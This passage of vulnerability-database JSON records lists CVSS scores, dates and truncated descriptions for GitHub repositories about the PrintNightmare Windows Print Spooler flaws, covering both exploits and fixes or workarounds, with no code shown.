"NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:03:49", "id": "B8D9E2C0-202B-5806-88D2-B0E797582618", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T14:37:24", "description": "# PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T15:15:12", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-18T12:17:12", "id": "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T17:02:43", "description": "= Print Nightmare \u5206\u6790\u62a5\u544a\n:imagesdir: Figures\n:toc:\n:icons: font\n:f...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-22T10:49:30", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-03-16T09:18:03", "id": "F1B229EB-2178-53B9-839E-BA0B916376A2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T23:46:37", "description": "# CVE-2021-34527-CVE-2021-1675\nPrintNightmare+Manual\nhttps://sat...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-19T23:20:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-02-19T23:20:58", "id": "86F04665-0984-596F-945A-3CA176A53057", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T00:25:23", "description": "# It Was All A Dream\n\nA [CVE-2021-34527](https://msrc.microsoft....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-05T20:13:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-23T19:20:20", "id": "0BB19334-D311-5464-B40B-7B27A0AD8825", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:20:53", "description": "# CVE-2021-34481\nCheck patch for CV...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T16:56:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-08-11T17:01:18", "id": "5E52E412-B5BA-54D6-92C1-F70C151A8199", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T12:23:19", "description": "# Introduction\nPrintNightmare-Patcher, a simple tool that resolv...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T14:14:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:17:08", "id": "D089579B-4420-5AD5-999F-45063D972E66", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:19", "description": "# PowerShell-PrintNightmare\nA collection of scripts to help set ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T21:28:16", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-11T16:21:00", "id": "98CA9A39-577D-51F2-B8B9-B20E80D94173", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:24", "description": "# Printnightmare\nFix for PrintNightmare CVE-2021-34527\n\n![Printn...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T09:22:03", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-09T11:02:54", "id": "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:16:59", "description": "# disable-RegisterSpoolerRemoteRpcEndPoint\nWorkaround for Window...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T16:49:32", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-08T21:11:43", "id": "E235B3DF-990F-5508-9496-90462B45125D", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:56", "description": "PrintNightmare CVE-2021-34527 powershell PowerShell workaround t...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T20:02:50", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T13:34:12", "id": "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:48", "description": "# Disable-Spooler-Service-PrintNightmare-CVE-2021-34527\nSimple ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-07T06:41:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T06:47:16", "id": "8542D571-7253-5609-BC52-CBCB5F40929A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:34", "description": "# Fix-CVE-2021-34527\nFix for the securit...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T14:25:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-03T09:03:00", "id": "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-31T11:27:43", "description": "# CVE-2021-34527\n\nCVE-2021-34527 LPE exploit using AddPrinterDri...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-05T23:48:44", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-05-31T11:23:37", "id": "436B5B97-EF58-5F05-B611-815DDEF67B8A", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T14:29:26", "description": "# PrintNightmare CVE-2021-34527\n\nBy now you most probably alread...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T07:58:53", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:16:25", "id": "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:32", "description": "# CVE-2021-34527-PrintNightmare-Workaround\n\nThis simple PowerShe...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T17:50:56", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-18T12:17:32", "id": "BDFBDA81-0DEB-5523-B538-F23C3B524986", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T06:22:28", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-13T10:04:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-12-13T10:21:38", "id": "3DC96731-93EE-5FF0-9AC3-C472059DC1AF", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:55:35", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T01:32:18", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-09T03:54:14", "id": "1E42289A-77F8-55A2-B85E-83CAA00CE951", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:14:04", "description": "# PsFix-CVE-2021-34527\nFix-CVE-2021-34527\nFi...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-07T20:14:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T20:18:26", "id": "26B4C125-95CE-54A5-82FB-2D1C219A09CB", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:27:35", "description": "### CVE-2021-1675 \n\n\u4fee\u6539\u81eahttps://github.com/sailay1996/Prin...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-20T06:26:45", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-10-24T06:07:21", "id": "19D705F8-AE98-5DD9-BC4E-CDC0497FB840", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T15:04:04", "description": "# PrintNightmare\n\n![image](https://user-images.githubusercontent...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, 